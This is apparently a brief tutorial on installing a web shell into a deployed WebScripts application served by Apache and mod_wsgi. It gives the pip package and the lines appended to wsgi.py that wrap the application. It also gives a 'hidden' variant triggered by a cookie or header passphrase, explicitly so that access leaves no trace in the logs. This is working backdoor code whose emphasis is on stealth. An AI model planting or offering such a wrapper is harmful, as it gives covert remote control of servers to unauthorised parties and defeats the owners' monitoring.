Install a WebShell on hardened and deployed WebScripts (using Apache and mod_wsgi).
WebShell on WebScripts - Youtube
Install requirements in virtualenv:
pip install PyWCGIshellAdd 4 lines to the end of the wsgi.py file.
from PyWCGIshell import WebShell
webshell = WebShell(type_="wsgi")
webshell.standard_page = application
application = webshell.run- To use the WebShell add
?$HELLto the end of the URL - The
$HELLin the query string is visible in the logs, i do not recommend using the default WebShell configuration.
Hidden WebShell
from PyWCGIshell import WebShell
webshell = WebShell(type_="wsgi", passphrase="azerty", pass_type="header_value")
webshell.standard_page = application
application = webshell.run- To use the WebShell add
azertyin a header value (for example in a cookie, in the javascript console:document.cookie="azerty") and reload the page - The value of the cookie is not visible in the logs
- You should change the passphrase for more discretion
